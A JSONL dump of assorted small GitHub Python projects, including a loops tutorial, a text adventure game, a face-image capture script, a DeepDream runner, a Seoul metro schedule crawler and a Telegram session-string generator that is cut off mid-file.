+{"seq_id":"16425624683","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Looping Syntax \n# \n# Loops are used for repetitive tasks:\n# \n# Instead of this:\n# \n# `print(\"string\")\n# print(\"string\")\n# print(\"string\")\n# print(\"string\")`\n# ...\n# \n# You can do this:\n# \n# `x=1\n# while x<5:\n# print(\"string\")`\n\n# In[1]:\n\n\nx=1\nwhile x<5:\n print(\"string\")\n print(\"Current x is :\",x)\n x=x+1\n print(\"Final x is :\",x)\n\n\n# ## Counted Loop\n# \n# `for x in range(1,5):\n# print (x)`\n\n# In[2]:\n\n\nfor x in range(1,5):\n print(x)\n\n\n# In[3]:\n\n\n# counted loop\nn = range(1,10,5)\nprint(n)\nfor i in n:\n print (i, \"python\")\n\n\n# ## List Loop\n# \n# - Lost loops iterate over the value in a list\n# - The loop will execute once for each value in the list\n\n# In[4]:\n\n\n# list loop\nmylist = [[1,2],[3,6],[4,5]]\n# number of columns in a multi dimensional list - len(mylist[0]) ->2\n# number of rows len(mylist) ->3\nfor item in mylist: \n print (item, \"times Python\")\n \n\n\n# In[5]:\n\n\n# breaking out of loops\n# find the maximum number below 1000 that divides by 12\nfor n in range(1000, 0, -1):\n print(n)\n div = n % 12\n print(div)\n if div == 0:\n print (n)\n break\n\n\n\n# Q1)Why use break above?\n\n# In[6]:\n\n\ncv = [[0.1,1],[0.5,11],[0.8,3]]\ncw=0.6\n\n#calculate overall score list for single criterion\n\ndlist = []\nfor i in cv:\n dlist = dlist +i\n print(dlist)\n \n # overall = i*cw\n #print(overall)\n \noveralls=[]\nfor i in dlist:\n overall= i*cw\n overalls.append(overall)\n \nprint(overalls) \n#for i in range(0, len(cv)):\n# print(i)\n\n\n# In[7]:\n\n\ncv = [0.1,0.5,0.8]\ncw=0.6\n\noverall =[]\n\nfor i in range(0, len(cv)):\n overall.append(cv[i]*cw)\n \nprint (overall)\n\n\n# In[8]:\n\n\ncv1= [0.1,0.5,0.8]\ncv2 = [0.2,0.3,0.4]\ncw=[0.6, 0.4]\noveralls=[]\n\n\n\n#check if the both criterion has the equal number of elements\n#calculate overall score list for criteria\n\n\n# In[9]:\n\n\ncv1= [0.1,0.5,0.8]\ncv2 = [0.2,0.3,0.4]\ncw=[0.6, 0.4]\noveralls=[]\n\ncw[1]\n\nif len(cv1)==len(cv2):\n for i in range(0,len(cv1)): \n overall = cv1[i]*0.6+cv2[i]*0.4\n \n overalls.append(overall)\n print(overalls)\nelse:\n print(\"Criteria lists are not equal!\")\n\n","repo_name":"salapayca/mappypython","sub_path":"_build/jupyter_execute/9_Looping_Around.py","file_name":"9_Looping_Around.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16037145473","text":"from BikerEnv import State\nfrom numpy.random import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error\nimport random\n\nclass ValueFunctionApproximator:\n def __init__(self, n=4) -> None:\n self.weights = random(size=n)\n\n def predict(self, s, a=None):\n pass\n\n def stochastic_gradient_descent(X, y_true, epochs, learning_rate=0.01): # X-> train data, y_true -> test outcome data(count), epoch-> iterations\n\n number_of_features = X.shape[1]\n\n # numpy array with 1 row and columns equal to number of features\n w = np.ones(shape=(number_of_features))\n b = 0 # bias\n total_samples = y_true.shape[0]\n\n cost_list = []\n epoch_list = []\n\n for i in range(epochs):\n random_index = random.randint(0, total_samples - 1) # random index from total samples\n\n sample_x = X.iloc[random_index]\n sample_y = y_true.iloc[random_index]\n\n sample_x_transp = X.iloc[random_index, :].values.reshape(1, X.shape[1])\n\n y_predicted = abs(np.dot(w, sample_x.T) + b) #abs value due to longtitude having a negative value a lot\n\n #gradient for weight and bias\n w_grad = -(2 / total_samples) * (sample_x_transp.T.dot(y_predicted - sample_y))\n b_grad = -(2 / total_samples) * (y_predicted - sample_y)\n\n w = w - learning_rate * w_grad # update weight\n b = b - learning_rate * b_grad # bias update\n\n mse = mean_squared_error(sample_y, y_predicted)\n\n if i % 50 == 0: # every 50th iteration record the cost and epoch value\n cost_list.append(mse)\n epoch_list.append(i)\n\n return w, mse","repo_name":"Adeleet/1CM240-Group1-Bike-Rebalancing","sub_path":"VFA.py","file_name":"VFA.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"8297270423","text":"import sys,os,shutil,glob\nsys.path.append(\".local/lib/python{}.{}/site-packages\".format(sys.version_info.major,sys.version_info.minor))\nfrom magiconfig import ArgumentParser, MagiConfigOptions, ArgumentDefaultsRawHelpFormatter\nfrom argparse import _AppendAction, Action\nfrom collections import OrderedDict\nfrom data import EventData\nfrom utils import config_path, import_attrs\nconfig_path()\n\nclass OrderedDictAction(_AppendAction):\n def __call__(self, parser, namespace, values, option_string=None):\n items = getattr(namespace, self.dest, None)\n if items is None:\n items = OrderedDict()\n else:\n items = self._copy_items(items)\n results = self.parse_params(values)\n items.update(results)\n setattr(namespace, self.dest, items)\n\n # from argparse\n def _copy_items(self, items):\n if items is None:\n return []\n # The copy module is used only in the 'append' and 'append_const'\n # actions, and it is needed only when the default value isn't a list.\n # Delay its import for speeding up the common case.\n if type(items) is list:\n return items[:]\n import copy\n return copy.copy(items)\n\n def parse_params(self, args):\n pass\n\nclass ParamAction(OrderedDictAction):\n def parse_params(self, args):\n results = []\n counter = 0\n while counter < len(args):\n name = str(args[counter])\n counter += 1\n\n pmin = float(args[counter])\n counter += 1\n\n pmax = float(args[counter])\n counter += 1\n\n results.append((name, (pmin,pmax)))\n return results\n\nclass FileSepAction(ParamAction):\n _final_type = str\n def parse_params(self, args):\n results = []\n counter = 0\n key = []\n for counter in range(len(args)):\n if counter==len(args)-1:\n results.append((tuple(key), str(args[counter])))\n else:\n try:\n k = float(args[counter])\n except:\n k = self._final_type(args[counter])\n key.append(k)\n return results\n\nclass XsecSepAction(FileSepAction):\n _final_type = float\n\nclass ImportAction(Action):\n def __call__(self, parser, namespace, values, option_string=None):\n if isinstance(values,str):\n item = import_attrs(values, self.dest)\n setattr(namespace, self.dest, item)\n\n# wrapper to handle common arguments and checks\nclass EVNParser:\n def __init__(self, name, basic=False, model_default=\"models\"):\n self.parser = ArgumentParser(config_options=MagiConfigOptions(), formatter_class=ArgumentDefaultsRawHelpFormatter)\n # common arguments\n self.parser.add_argument(\"--name\", type=str, default=name, help=\"name of operation (used for saved config filename and output subdirectory)\")\n self.parser.add_argument(\"-f\", \"--force\", default=False, action=\"store_true\", help=\"overwrite existing config\")\n self.parser.add_argument(\"-v\", \"--verbose\", default=False, action=\"store_true\", help=\"enable verbose output\")\n self.parser.add_argument(\"--outf\", type=str, required=True, help=\"output folder\")\n self.parser.add_argument(\"--model-dir\", type=str, default=model_default, help=\"directory for saved model file\")\n if basic: return\n self.parser.add_argument(\"--process\", type=str, required=True, choices=sorted(list(EventData.processes)), help=\"process name\")\n self.parser.add_argument(\"--filedir\", type=str, required=True, help=\"directory for process files\")\n self.parser.add_argument(\"--filenames\", type=str, default=[], nargs='+', required=True, help=\"process files for training\")\n self.parser.add_argument(\"--filenames-sep\", metavar=(\"key1 [key2...] 
filename\"), default=OrderedDict(), action=FileSepAction, nargs='*', help=\"separate process files for analysis (keys assumed to be float or str) (can be called multiple times)\")\n self.parser.add_argument(\"--xsecs-sep\", metavar=(\"key1 [key2...] xsec\"), default=OrderedDict(), action=XsecSepAction, nargs='*', help=\"separate process cross sections for analysis (keys assumed to be float or str) (can be called multiple times)\")\n self.parser.add_argument(\"--params\", metavar=(\"name min max\"), default=OrderedDict(), action=ParamAction, nargs='*', help=\"param (theta) name(s) & range(s) (can be called multiple times)\")\n self.parser.add_argument(\"--inputs\", type=str, default=[], nargs='+', help=\"input feature name(s)\")\n self.parser.add_argument(\"--theory\", type=str, default=[], nargs='+', help=\"theory variable name(s)\")\n self.parser.add_argument(\"--extras\", type=str, default=[], nargs='+', help=\"extra name(s)\")\n self.parser.add_argument(\"--weights\", type=str, default=[], nargs='+', help=\"weight name(s)\")\n self.parser.add_argument(\"--selections\", metavar=(\"name min max\"), type=str, default=None, nargs='+', action=ParamAction, help=\"selection variable name(s) & range(s)\")\n self.parser.add_argument(\"--axes\", required=True, action=ImportAction, help=\"axis info file (provides dict of dicts)\")\n\n def parse_args(self, argv=None, checker=None, save=lambda x: True):\n if argv is None: argv = sys.argv[1:]\n args = self.parser.parse_args(argv)\n # do any common error checking\n # do specific error checking\n if checker is not None:\n args = checker(args)\n # save the config\n if save(args):\n os.makedirs(args.outf, exist_ok=True)\n oname = \"{}/config_{}.py\".format(args.outf,args.name)\n if not args.force and os.path.isfile(oname):\n raise RuntimeError(\"Will not overwrite existing output config {}\".format(oname))\n self.parser.write_config(args, oname)\n return args\n\n def get_process(self, args, mask=None):\n process = EventData.processes[args.process](args.filedir, args.filenames, args.filenames_sep, args.params, args.inputs, args.theory, args.extras, args.weights, args.xsecs_sep, args.selections, mask=mask)\n return process\n","repo_name":"kpedro88/evn_svj_public","sub_path":"args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":6167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"29535431144","text":"import json\nfrom urllib import response\nfrom youtube_transcript_api import YouTubeTranscriptApi\nfrom flask import Flask, request\nimport spacy\nnlp = spacy.load('en_core_web_lg')\n#https://www.youtube.com/watch?v=7y_2jQlnKag\n#Introduction to Factoring Higher Degree Factorials\n\napp = Flask(__name__)\n\n@app.route(\"/match\", methods = [\"GET\"])\ndef findBestMatch():\n youtubeID = request.args.get('yt_id')\n userQuery = request.args.get('q')\n transCpt = YouTubeTranscriptApi.get_transcript(youtubeID)\n ans = \"\"\n ansTime = 0.0\n doc1 = nlp(userQuery)\n for transcriptEntry in transCpt:\n transcriptEntry['text'].replace('\\n', ' ')\n doc2 = nlp(transcriptEntry['text'])\n if doc1.similarity(doc2) > ansTime:\n ans = transcriptEntry['text']\n ansTime = transcriptEntry['start']\n return {'ans': ans, 'ansTime': ansTime}\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"dhruvv/hackmit-statesquad","sub_path":"backend/ytb.py","file_name":"ytb.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"26148064691","text":"from affine import Affine\nfrom vigenere import Vigenere\n\n\ndef main():\n cipher_file = open('cipher.txt', 'r')\n cipher_text = cipher_file.read()\n print('*** cracking with affine cipher method ***')\n affine = Affine()\n decrypted = affine.crack(cipher_text)\n if decrypted:\n return decrypted\n print(\"*** can't crack with affine method ***\")\n\n print(\"*** cracking with vigenere ***\")\n vigenere = Vigenere()\n decrypted = vigenere.crack(cipher_text)\n if decrypted:\n return decrypted\n else:\n return None\n\n\nif __name__ == '__main__':\n m = main()\n if m:\n print(f'cracked message is ====>\\t {m}')\n else:\n print(\"Can't crack the message\")\n","repo_name":"Sinaeskandari/Affine-Vigenere-Cracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73749976694","text":"#! python3\r\n\r\n# The player must choose the options. \r\n# They may try to guest the animal will be present and reach the score more than 10 during encounter the animals. \r\n\r\nimport time, math, random, sys, textwrap\r\nimport textgame, constants\r\n\r\n\r\nclass Game(object):\r\n def __init__(self):\r\n self.done = False\r\n self.score = 5 # 10 score is the goal to win\r\n self.energy = 5 # 5 is the starting energy\r\n self.full = 10 # 10 is the maximum energy \r\n self.turns = 0 # the number of game you takes\r\n\r\n def intro(self):\r\n for char in textwrap.dedent(constants.INTRO):\r\n time.sleep(0.05)\r\n sys.stdout.write(char)\r\n sys.stdout.flush()\r\n\r\n time.sleep(0.1)\r\n\r\n def random_object(self,value):\r\n if value == 1:\r\n return \"route\"\r\n\r\n elif value == 2:\r\n return \"wolf\"\r\n \r\n elif value == 3:\r\n return \"bear\"\r\n \r\n else:\r\n return \"tiger\"\r\n\r\n def status(self):\r\n # Alert User with energy\r\n print(f\"Your energy is {self.energy}\")\r\n \r\n # Alert user with score \r\n print(f\"Your score is {self.score}\")\r\n\r\n def random_event(self, choice):\r\n if choice != \"s\":\r\n i = random.randint(1,4)\r\n return i\r\n else:\r\n return 0\r\n\r\n def increase_energy(self):\r\n if self.energy < self.full:\r\n self.energy += 1\r\n \r\n else:\r\n print(\"\\nYour energy reach the maximum.\")\r\n\r\n def apply_choice(self, choice, randvalue):\r\n if choice.lower().strip(\".,! \") == \"q\":\r\n self.done = True\r\n\r\n elif choice.lower().strip(\"!,. \") == \"s\":\r\n print(f\"\"\"\r\n ---Status Check---\r\n energy: {self.energy}\r\n score: {self.score}\r\n for sucess {10 - self.score} socre behind you. \r\n lost {self.score} score will failed.\r\n \r\n\"\"\")\r\n\r\n elif choice.lower().strip(\",.! \") == \"r\":\r\n self.increase_energy()\r\n if randvalue == 1:\r\n print(\"\\n A new path appears. You increased energy and your score remains the same.\")\r\n \r\n else:\r\n self.score -= 1\r\n print(f\"\\nWhile you are resting you encounter {self.random_object(randvalue)}. lose 1 point.\")\r\n\r\n\r\n elif choice.lower().strip(\"!,. \") == \"d\":\r\n if self.energy > 1:\r\n if randvalue == 4:\r\n self.energy -= 1\r\n self.score -= 1\r\n print(\"\\n You encounter Tiger! Tiger is fast, and you are caught. lost 1 score.\")\r\n \r\n elif randvalue == 1:\r\n self.energy -= 1\r\n self.score -= 1\r\n print(\"\\n You have missed a easier route to home. You lose 1 point!\")\r\n\r\n else:\r\n self.score += 1\r\n print(\"\\n You detour correctly, gets 1 score.\")\r\n self.energy -= 2\r\n\r\n else:\r\n self.score -= 1\r\n print(\"\\n Your energy is used up, you cannot detour! lost 1 points.\")\r\n\r\n elif choice.lower().strip(\"!,. \") == \"e\":\r\n if randvalue == 1:\r\n self.score += 1\r\n print(\"\\n You explore a new route, gets 1 point.\")\r\n\r\n else:\r\n self.score -= 1\r\n print(\"\\nYou did not explore anything, lose 1 point.\")\r\n\r\n elif choice.lower().strip(\"!,. \") == \"f\": \r\n if randvalue == 4:\r\n self.energy -= 1\r\n self.score -=1 \r\n print(\"\\nTiger's speed is really fast and comes to attack you. Fortunately it is not hungry and it walks away.\")\r\n \r\n elif randvalue == 1:\r\n self.energy -= 1\r\n self.score -=1 \r\n print(\"\\nYou have missed a easier route to home. You lose 1 point!\")\r\n\r\n else:\r\n print(f\"\\nGood job {self.random_object(randvalue)} cannot reach you! Your score keeps the same.\")\r\n\r\n elif choice.lower().strip(\"!,. 
\") == \"h\": \r\n if randvalue == 1:\r\n self.score -= 1\r\n print(\"\\nThere is a route appears to your sight, but unfortunately you choose to hide, so your score minus 1.\")\r\n\r\n else:\r\n self.score += 1 \r\n print(f\"\\nA {self.random_object(randvalue)} pass by you, but since you are hide at a great spot it did not see you. Score plus 1!\")\r\n\r\n def end_game(self):\r\n ending = None\r\n\r\n # The Win Condition\r\n if self.score > 9 or self.turns > 9:\r\n time.sleep(2)\r\n ending = f\"\"\"\\\r\n ------------------------ \r\n ...Lucky for you! A helicopter is patrol nearby, it saw you and arrived to help you!\r\n Without losing anything you are safely back home.\r\n It takes you {self.turns} turns.\r\n The Helicopter will bring you home.\r\n\r\n -------- Game Over -------- \r\n \"\"\"\r\n self.done = True \r\n\r\n # end game for agents catching up\r\n elif self.score < 0:\r\n ending = f\"\"\"\\\r\n \r\n ---------------------\r\n ...... Failed! ......\r\n You now is trapped in the forest without any food or water left in your backpack.\r\n \r\n After two days of hunger you \r\n You failed in {self.turns} turns.\r\n If continue you may have less chance to success.\r\n More risk will be present to you if continue.\r\n You should change your strategy or pick options way.\r\n \r\n -------- Game Over --------\r\n \"\"\"\r\n\r\n self.done = True\r\n\r\n if self.done == True:\r\n if ending != None:\r\n for char in textwrap.dedent(ending):\r\n time.sleep(0.05)\r\n sys.stdout.write(char)\r\n sys.stdout.flush()\r\n\r\n print(f\"\\nYou finished the game in {self.turns} turns.\\n\")\r\n else:\r\n print(\"Thanks for playing!\")\r\n\r\n def update(self):\r\n # Main Instructions\r\n print(constants.CHOICES)\r\n\r\n self.status()\r\n\r\n choice = input(\"What do you want to do? \")\r\n self.turns += 1\r\n r = self.random_event(choice.lower())\r\n self.apply_choice(choice.lower(),r)\r\n\r\n self.end_game()\r\n time.sleep(1)\r\n","repo_name":"RachelC1231/Text-Game","sub_path":"textgame.py","file_name":"textgame.py","file_ext":"py","file_size_in_byte":6617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25235450495","text":"\n# Creating database\n# It captures images and stores them in datasets \n# folder under the folder name of sub_data\nimport cv2, sys, numpy, os\nfrom imutils.video import VideoStream\nimport imutils\nimport time\n\nimport argparse\n\n# All the faces data will be\n# present this folder\n\n\ndef main(args):\n datasets = 'Dataset/FaceData/raw' \n haar_file = 'src/Models/haarcascade_frontalface_default.xml'\n face_cascade = cv2.CascadeClassifier(haar_file)\n \n # These are sub data sets of folder, \n # for my faces I've used my name you can \n # change the label here\n sub_data = args.username \n print (sub_data)\n path = os.path.join(datasets, sub_data)\n if not os.path.isdir(path):\n os.mkdir(path)\n \n cap = VideoStream(src=0).start()\n\n\n # The program loops until it has 30 images of the face.\n count = 0\n while count < 100: \n frame = cap.read()\n frame = imutils.resize(frame, width=600)\n frame = cv2.flip(frame, 1)\n cv2.imshow(sub_data, frame)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 4)\n for (x, y, w, h) in faces:\n cv2.imwrite('% s/% s.png' % (path, count), frame)\n count += 1\n print (count)\n time.sleep(0.2) \n\n \n key = cv2.waitKey(10)\n if key == 27:\n break\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument('username', type=str,\n help='Path to the test data directory containing aligned images used for testing.')\n \n return parser.parse_args(argv)\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))\n","repo_name":"hoanglnit/FaceNetPi","sub_path":"build_raw_dataset.py","file_name":"build_raw_dataset.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"20506086182","text":"import sys\nimport os\nimport shutil\nfrom jsmin import jsmin\n\nis_release = False\n\ndef minifie(src, dest):\n if is_release:\n with open(src) as input:\n minified = jsmin(input.read())\n output = open(dest, 'w+')\n output.write(minified)\n output.close()\n else:\n shutil.copy2(src, dest)\n\ndef main():\n global is_release\n\n if len(sys.argv) == 2:\n if sys.argv[1] == \"release\":\n is_release = True\n elif sys.argv[1] == \"test\":\n os.system(\"cargo test && wasm-pack test --node\")\n return\n\n if not os.path.exists(\"build\"):\n os.makedirs(\"build\")\n\n os.system(\"wasm-pack build --no-typescript --target no-modules \" +\n (\"--release\" if is_release else \"\"))\n shutil.copy2(\"pkg/roguelike_bg.wasm\", \"build/roguelike_bg.wasm\")\n minifie(\"pkg/roguelike.js\", \"build/roguelike.js\")\n\n shutil.copy2(\"index.html\", \"build/index.html\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"eeli1/roguelike","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73950872427","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\n\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nfrom deep_dream import deep_dream\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--img_file\", type=str, default=\"images/supermarket.jpg\", help=\"path to input image\")\n parser.add_argument(\"--iterations\", default=20, help=\"number of gradient ascent steps per octave\")\n parser.add_argument(\"--at_layer\", default=27, type=int, help=\"layer at which we modify image to maximize outputs\")\n parser.add_argument(\"--lr\", default=0.01, help=\"learning rate\")\n parser.add_argument(\"--octave_scale\", default=1.4, help=\"image scale between octaves\")\n parser.add_argument(\"--num_octaves\", default=10, help=\"number of octaves\")\n\n return parser.parse_args()\n\n\ndef main(\n img_file: str,\n iterations: int,\n at_layer: int,\n lr: float,\n octave_scale: float,\n num_octaves: int,\n):\n # Load image\n img = np.asarray(Image.open(img_file))\n\n # Extract deep dream image\n dreamed_image = deep_dream(\n img,\n at_layer=at_layer,\n iterations=iterations,\n lr=lr,\n octave_scale=octave_scale,\n num_octaves=num_octaves,\n )\n\n # Save and plot image\n os.makedirs(\"outputs\", exist_ok=True)\n filename = args.img_file.split(\"/\")[-1]\n plt.figure(figsize=(20, 20))\n plt.imshow(dreamed_image)\n plt.imsave(f\"outputs/dreamed_{filename}\", dreamed_image)\n plt.show()\n\n\nif __name__ == \"__main__\":\n args = get_args()\n main(**vars(args))\n\n","repo_name":"haruishi43/deepdream","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"35640340819","text":"# I assume formatting the dictionary in this way is ok. I create objects this way in JavaScript.\nCOLOURS = {\n \"AliceBlue\": \"#f0f8ff\",\n \"Beige\": \"#f5f5dc\",\n \"Black\": \"#ffffff\",\n \"BlueViolet\": \"#8a2be2\",\n \"Coral\": \"#ff7f50\",\n \"DarkGreen\": \"#006400\",\n \"Gold1\": \"#ffd700\",\n \"Gray\": \"#bebebe\",\n \"HotPink\": \"#ff69b4\",\n \"Magenta\": \"#ff00ff\"\n}\n\nfor colour in COLOURS:\n max_length = max([len(colour) for colour in COLOURS])\n print(f\"The hex code for {colour:{max_length}} is {COLOURS[colour]}\")\n\ncolour_name = input(\"Enter colour name: \")\nwhile colour_name != \"\":\n valid = False\n for colour in COLOURS:\n if colour_name.upper() == colour.upper():\n print(COLOURS[colour])\n valid = True\n if valid == False:\n print(\"That is not a valid colour. Please try again.\")\n colour_name = input(\"Enter colour name: \")\n\nprint(\"Exiting program\")","repo_name":"FinOCE/CP1404","sub_path":"prac_05/hex_colours.py","file_name":"hex_colours.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"19371131982","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\n\ndef crawling(station_code):\n\n url = 'http://www.seoulmetro.co.kr/kr/getStationInfo.do?action=time&stationId=' + str(station_code )\n # 서울메트로 접속후 post방식으로 크롤링\n\n response = requests.get(url)\n\n if response.status_code == 200:\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n else :\n print(response.status_code)\n\n filter_data = soup.find_all('a')\n filter_data2 = soup.find_all('li')\n\n types = [] # 급행인지 일반인지(일반, 급행)\n times = [] # 시간(시:분) \n weeks = [] # 1: 평일, 2: 주말, 3: 공휴일\n destinations = [] # 도착지(ex. 청량리행, 천안행, 구로행 등)\n\n \n for i in filter_data:\n try:\n strings = i.get_text().split()\n times.append(i['time'] + ':' + strings[0][:-1])\n \n if i['week'] == '1':\n weeks.append('평일')\n elif i['week'] == '2':\n weeks.append('주말')\n else:\n weeks.append('공휴일')\n \n destinations.append(strings[-1][:-1])\n \n except:\n continue\n\n for j in filter_data2:\n try:\n if j['class'][0]=='G':\n types.append('일반')\n elif j['class'][0]=='D':\n types.append('급행')\n except:\n continue\n \n\n return types, times, weeks, destinations\n\ndef real_time_subway_location(location):\n url = 'http://swopenAPI.seoul.go.kr/api/subway/544f6a5a766b6b73313036426657754f/json/realtimeStationArrival/0/10/' + location\n\n response = requests.get(url)\n src = response.text\n src_json = json.loads(src)\n\n updnline = [] # 상행, 하행\n bstatnNm = [] # 도착역\n cur_loc = [] # 현재 위치\n arvlCd = [] # 현재 열차의 상태(0:진입, 1:도착, 2:출발, 3:전역출발, 4:전역진입, 5:전역도착, 99:운행중)\n\n\n for row in src_json['realtimeArrivalList']:\n updnline.append(row['updnLine'])\n bstatnNm.append(row['bstatnNm'])\n cur_loc.append(row['arvlMsg3'])\n arvlCd.append(row['arvlCd'])\n \n return updnline, bstatnNm, cur_loc, arvlCd\n\n\ndef main():\n crawling_data = crawling(1408)\n api_data = real_time_subway_location('신창')\n \n crawling_data_json = {\n 'types' : crawling_data[0],\n 'times' : crawling_data[1],\n 'weeks' : crawling_data[2],\n 'destinations' : crawling_data[3]\n }\n \n api_data_json = {\n 'updnline' : api_data[0],\n 'bstatnNm' : api_data[1],\n 'cur_loc' : api_data[2],\n 'arvlCd' : api_data[3]\n }\n \n crawling_data_json = json.dumps(crawling_data_json, indent = 4, ensure_ascii = False)\n api_data_json = json.dumps(api_data_json, indent = 4, ensure_ascii = False)\n \n return crawling_data_json, api_data_json\n\n\nif __name__ == \"__main__\":\n main_json = main()\n# 신창역 코드: 1408","repo_name":"0001010/Learn-Growth","sub_path":"Crawling/Seoul_Metro_Line1_Schedule(Sinchang).py","file_name":"Seoul_Metro_Line1_Schedule(Sinchang).py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19993175649","text":"import glob\nimport os\nimport re\nimport json\n\n\nclass OverrideFileInfo:\n\n def __init__(self, override_file_paths, repo_root_path):\n self.override_file_paths = override_file_paths\n self.repo_root_path = repo_root_path\n self._label_to_fq_label = self._build_name_to_override_dependencies()\n\n @property\n def label_to_overridden_fq_label(self):\n return self._label_to_fq_label\n\n def _build_name_to_override_dependencies(self):\n \"\"\"\n Returns a dict for all overrides dependencies\n\n The mapping is of the form: {dep: overridden_dep}\n \"\"\"\n override_file_names_and_paths = self._get_override_file_names_and_paths()\n if override_file_names_and_paths == 0:\n return {}\n overrides_dict = {}\n for (_, fpath) in override_file_names_and_paths:\n parsed_data = self._parse_override_file(fpath)\n overrides_dict.update(parsed_data)\n return overrides_dict\n\n def _get_override_file_names_and_paths(self):\n \"\"\"\n Returns a list of tuples (override file name, override file path)\n \"\"\"\n names_and_paths = []\n for rel_path in self.override_file_paths:\n path = os.path.join(self.repo_root_path, rel_path)\n name_and_path = self._process_path(path)\n if name_and_path is None:\n globbed_names_and_paths = []\n if \"*\" in path:\n for path in glob.glob(path):\n name_and_path = self._process_path(path)\n if name_and_path is not None:\n globbed_names_and_paths.append(name_and_path)\n names_and_paths += sorted(globbed_names_and_paths)\n else:\n raise Exception(\"override file path not found [%s]\" % path)\n else:\n names_and_paths.append(name_and_path)\n return names_and_paths\n\n def _parse_override_file(self, file_path):\n \"\"\"\n Returns a dict of {dep: overridded_dep} mapping\n \"\"\"\n with open(file_path, \"r\") as f:\n contents = f.read()\n\n # Removes comments\n contents = re.sub(\"#.*\\n\", \"\", contents).split(\"{\")[1].split(\"}\")[0]\n\n # Removes whitespaces\n contents = re.sub(r'\":\\s+', '\":', contents)\n contents = re.sub(r',\\s+', ',', contents)\n\n # Removes the extra comma if present\n if contents.endswith(\",\"):\n contents = contents[:-1]\n contents = \"{\" + contents.strip() + \"}\"\n override_data = json.loads(contents)\n output = {}\n\n # Updates /, . and - with _\n # Example - org.springframework:spring-jcl to org_springframework_spring_jcl\n for dep, overridded_dep in override_data.items():\n pattern = r'(?<=[^\\d])\\.|\\.(?=[^\\d])'\n output[re.sub(pattern, \"_\", dep.replace(':', '_').replace(\"-\", \"_\"))] = overridded_dep\n return output\n\n def _process_path(self, path):\n \"\"\"\n Returns a tuple (override file name, override file path) or None\n if the specified path is invalid.\n \"\"\"\n override_file_suffix = \".bzl\"\n if os.path.exists(path):\n fname = os.path.basename(path)\n if fname.endswith(override_file_suffix):\n return (fname[:-len(override_file_suffix)], path)\n return None\n","repo_name":"simontoens/pomgen","sub_path":"common/overridefileinfo.py","file_name":"overridefileinfo.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
+{"seq_id":"74974945386","text":"import colorama\nfrom colorama import Fore, Style\nfrom pyrogram import Client\nfrom telethon.sessions import StringSession\nfrom telethon.sync import TelegramClient\n\ncolorama.init(autoreset=True)\nAKSHITBOT_PIC = \"https://telegra.ph/file/8488fc6758ff283061324.jpg\"\n\n\nokbro = input(\"Enter y or yes continue: \")\n\nif okbro == \"y\" or \"yes\":\n print(\n Fore.GREEN\n + Style.BRIGHT\n + \"\"\"\\t\\t\n\n╭━━━┳╮╱╱╱╱╭╮╱╱╭╮╭╮╱╱╱╱╭╮\n┃╭━╮┃┃╱╱╱╱┃┃╱╭╯╰┫┃╱╱╱╭╯╰╮\n┃┃╱┃┃┃╭┳━━┫╰━╋╮╭┫╰━┳━┻╮╭╯\n┃╰━╯┃╰╯┫━━┫╭╮┣┫┃┃╭╮┃╭╮┃┃\n┃╭━╮┃╭╮╋━━┃┃┃┃┃╰┫╰╯┃╰╯┃╰╮\n╰╯╱╰┻╯╰┻━━┻╯╰┻┻━┻━━┻━━┻━╯\n \"\"\"\n )\n print(\"\\nChoose String Type \\n1.Telethon\\n2.Pyrogram\")\n library = input(\"\\nYour Choice:\")\n if library == \"1\":\n print(\"Welcome To Telethon String Generator\")\n APP_ID = int(input(\"Enter APP ID - \"))\n API_HASH = input(\"Enter API HASH - \")\n try:\n with TelegramClient(StringSession(), APP_ID, API_HASH) as bot:\n string_session = bot.session.save()\n print(\n \"You can Get Your String Session In Saved Message of Your Telegram Account. Remember To Make New String Session Whenever You Terminate Sessions.\"\n )\n bot.send_file(\n \"me\",\n AKSHITBOT_PIC,\n caption=f\"`{string_session}`\\n\\n• __Dont Share String Session With 